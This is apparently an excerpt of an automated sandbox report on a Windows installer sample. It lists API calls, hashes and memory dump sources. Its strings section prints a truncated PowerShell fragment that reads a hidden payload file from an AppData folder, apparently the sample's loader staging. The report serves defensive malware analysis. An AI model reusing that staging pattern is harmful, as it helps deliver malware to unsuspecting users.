                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                      • Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
                                                                      • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                      • Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C
                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                      • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                      • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                      • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                      • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                      • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                      • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                      • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                      • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                      • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                                      • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                                      • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                                      • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                                      • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                                      • ShowWindow.USER32(00000000), ref: 00404F57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                      • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                                      • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                      • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                                      • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                                        • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 0040603D
                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406051
                                                                        • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406064
                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
                                                                      • "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich, xrefs: 00404449
                                                                      • : Completed, xrefs: 00404591, 00404596, 004045A1
                                                                      • A, xrefs: 00404553
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                      • String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                                      • API String ID: 2246997448-3744651803
                                                                      • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                      • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                                      • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                      • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 004020F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                                      • API String ID: 542301482-2519038138
                                                                      • Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                                      • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                                      • Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                                      • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                                      • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                                      • Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                                      • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                      • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                                      • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                      • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                                      • GetSysColor.USER32(?), ref: 00404212
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                                      • lstrlenW.KERNEL32(?), ref: 00404233
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                                      • SendMessageW.USER32(00000000), ref: 004042B5
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                                      • SetCursor.USER32(00000000), ref: 00404334
                                                                      • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                                      • SetCursor.USER32(00000000), ref: 00404358
                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
